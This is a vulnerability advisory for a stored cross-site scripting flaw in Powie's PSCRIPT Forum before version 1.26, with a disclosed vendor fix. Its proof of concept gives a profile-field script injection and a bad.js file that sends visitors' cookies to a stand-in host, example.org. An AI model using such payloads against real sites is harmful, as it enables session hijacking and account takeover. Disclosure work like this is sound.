pscript.de PFORUM XSS Vulnerability
Summary
+-----+
Product Powie's PSCRIPT Forum
Version All versions before 1.26
OS All with PHP and mySQL.
Vendor URL www.pscript.de
Vendor Status informed
Security Risk Lvl high
Remote Exploit yes
Introduction
+----------+
pforum is a BBS, similar to phpBB or other. The author provides
users possibility to enrich their profiles with personal data. Although
the author tries to eliminate malicious code (like unwanted html code)
in the inputs, two of the fields are not handled secure. Therefore it's
possible to steal cookies or do other nasty things.
More Details
+----------+
If you login into your account, pforum saves your user id, your password
and the PHP session id. If somebody redirects you, for example using
javascript, he can append all this data as a query string to the target
URL. Then he can easily using your PHP session id for hijacking your
pforum session. If he creates or modifies two cookies with the user id
or the crypted password, he can easily hijack your account only by visiting
the pforum.
Proof of Concept
+--------------+
Create a Javascript file and save it as bad.js (your domain name is in this
case example.org). The file contains the following code:
// bad.js
function b()
{
location.href='example.org/compute_stolen_data.ext?'+document.cookie;
}
Edit your profile and enter the following line into the the IRC Server or AIM
ID Input Box. The string have to be shorter then 100 characters.
// Input Box (without line break)
"><script src=http://example.org/bad.js></script>
<img height=0 width=0 src=foo onerror=b(); >
Post a lot. Because the picture can't be found and the onError Event Handler
catches this, every user with activated javascript will be automagically
redirected to http://example.org/compute_stolen_data.ext. All cookie values
will be appended to the URL.
Security Risk
+-----------+
Critical. You can get administrator or moderator of the forum.
Vendor
+----+
The Vendor reacted quickly and fixed the vulnerability satisfactorily in a new
version of the pforum (1.26).